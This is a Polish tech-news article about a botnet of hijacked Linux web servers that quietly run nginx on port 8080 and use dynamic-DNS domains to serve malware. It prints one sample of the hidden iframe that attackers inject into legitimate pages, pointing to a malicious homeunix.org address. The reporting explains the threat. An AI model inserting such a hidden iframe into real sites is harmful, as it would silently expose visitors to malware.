Botnet serwerów WWW: bo Linux też jest podatny na zombifikację
Denis Sinegubko, mieszkający na południu Rosji niezależny specjalista z dziedziny bezpieczeństwa IT, odkrył w Sieci coś niezwykłego, co raczej nie ucieszy miłośników Linuksa i rozmaitych, związanych z tych systemem mitów. Przemienione w zombie linuksowe serwery funkcjonują jak klasyczny botnet do zadań specjalnych, rozprowadzając w Sieci szkodliwe oprogramowanie.
„To co tu widzimy, to długo wyczekiwany botnet poddanych zombifikacji serwerów WWW! Grupa połączonych ze sobą serwerów ze wspólnym ośrodkiem sterującym, która służy rozprowadzaniu szkodników (…) a cały botnet jest połączony z botnetem działającym na normalnych, domowych komputerach PC” – z entuzjazmem rozpoczął swoją relację Sinegubko.
Każda z zarażonych maszyn odkrytych przez rosyjskiego badacza, to serwer wirtualny lub dedykowany, na którym hostowana jest całkiem legalna witryna, serwowana przez Apache'a na porcie 80. Jednak po cichu maszyny te uruchamiają serwer nginx na porcie 8080, wysyłając za jego pomocą szkodliwy kod. Jest to możliwe dzięki dostawcom dynamicznego DNS – DynDNS.com i No-IP.com – zapewniającym darmowe domeny, podłączane pod IP poddanych zombifikacji serwerów.
Usługi te dostarczają wielu (łącznie ponad stu) domen drugiego poziomu, które mogą być wykorzystane do konstruowania licznych i wiarygodnie wyglądających domen trzeciego poziomu. Dzięki temu atakujący mogą stosować nazwy takie jak np. server.homelinux.org – które zupełnie nie wyglądają jak typowe źródło malware'u.
Kolejnym krokiem jest wykorzystanie pływających ramek iframe, za pomocą których szkodliwy kod wstrzykiwany jest do normalnych stron internetowych. Wygląda to np. tak:
<iframe src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
«poprzednia 1 2 następna »
Komentarze
Aby dodać komentarz, musisz podać swój nick, treść komentarza oraz poprawnie przepisać oba słowa z obrazka
(słowa muszą być rozdzielone spacją).
W treści komentarza można używać języka formatowania BBcode.
Popularne
Nazwa padła ofiarą szantażystów, inni polscy hosterzy też zagrożeni?
22
Darmowy Internet od Aero2. Jak go zdobyć i jakie są prawdziwe koszta? Instrukcja krok po kroku
11
Programowanie w środowisku Android – wprowadzenie do projektowania aplikacji dla urządzeń mobilnych
17
Premiera Diablo 3 wzbudziła dyskusję na temat gier, które zawsze chcą być online
19
Nowy problem z Windows 8: bootuje się za szybko
10
Amerykańscy rodzice straszeni „e-narkotykami” dostępnymi w Sieci
21
Anonymous upubliczniają 1,7 GB danych wykradzionych Departamentowi Sprawiedliwości USA
11
Blueseed: libertariańska sztuczna wyspa przyciągnęła już ponad sto startupów z całego świata
8
Rewolucja w Firefoksie, nowa łatka czterokrotnie ograniczyła zużycie pamięci
20
Darmowy Internet od Aero2. Jak go zdobyć i jakie są prawdziwe koszta? Instrukcja krok po kroku
11
CVDazzle: makijaż jest w stanie pokonać automatyczne systemy ulicznego monitoringu
3
Programowanie w środowisku Android – wprowadzenie do projektowania aplikacji dla urządzeń mobilnych
17
Ubuntu 12.04 LTS już dostępny: stabilna dystrybucja na następne pięć lat?
28
Zostań webmasterem polskiego rządu, zarobisz na komfortowe życie dla siebie i swojej rodziny
33
Społeczność
kaziks Galaxy S II - u mnie po aktualizacji Firefox działa strasznie zacina się...
Doniek Szkoda że strona z demo nie działa - non stop się przeładowuje
bartez Niech zaczną jeszcze bardziej ograniczać programistów, to zdziwią się ilu...
Dave Smith Jestem Pastor Dave Smith prywatny pożyczkodawca pieniądze, z czego ponad...
marcusm Fajna reklama produktu za 500 zł
rza a to starsze aplikacje nie będą działać i kompilacja pod Windows SDK 7.1...
Krzaczor @Jakub Szymański: Możesz zalinkować do opisów jakichś polskich przypadków...
- Najdmen.pl: Konta www z wyłączonym licznikiem transferu od IONIC.pl (1)
- 2BE.PL: [Oferta] Promocja jak złoto w 2BE.PL (1)
- gardius: Dobra hurtownia sportowa (1)
- gardius: Tanie książki gdzie warto kupować? (1)
- Najdmen.pl: PROMOCJA, 500 DOMEN .EU ZA 1 PLN NETTO ! (1)
- VMLine: [Oferta] Serwery VPS Xen-HVM/OpenVZ z darmową administracją (2)
- Marek: Generowanie PDFa (2)
Polecane książki
Praca
Czytaj Webhosting
Chcesz być na bieżąco z naszymi informacjami? Zapisz się na Newsletter.
Zarejestruj domenę
Sprawdź dostępność swojej domeny:
| .pl: | 0 zł | .com: | 19.90 zł | |
|---|---|---|---|---|
| .com.pl: | 0 zł | .eu: | 19.90 zł |









#1 k6t 2009-09-14 09:52:08 0
IP: 149.156.124.[...] Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.13) Gecko/2009082121 Iceweasel/3.0.12 (Debian-3.0.12-1)
#2 zombie 2009-09-14 16:21:32 0
IP: 83.13.90.[...] Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
#3 Sławek 2009-09-14 19:54:35 0
IP: 85.89.175.[...] Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.0) Gecko/20090623 SUSE/3.5.0-7.1 Firefox/3.5
#4 dom 2009-09-14 22:10:18 0
IP: 82.143.185.[...] IBrowse/2.4 (AmigaOS 3.9; 68K)
#5 The Bit 2009-10-15 12:03:58 0
IP: 95.41.64.[...] Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
#6 ffatman 2009-11-08 14:14:25 0
IP: 86.76.22.[...] Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6pre) Gecko/20091106 Ubuntu/9.04 (jaunty) Shiretoko/3.5.6pre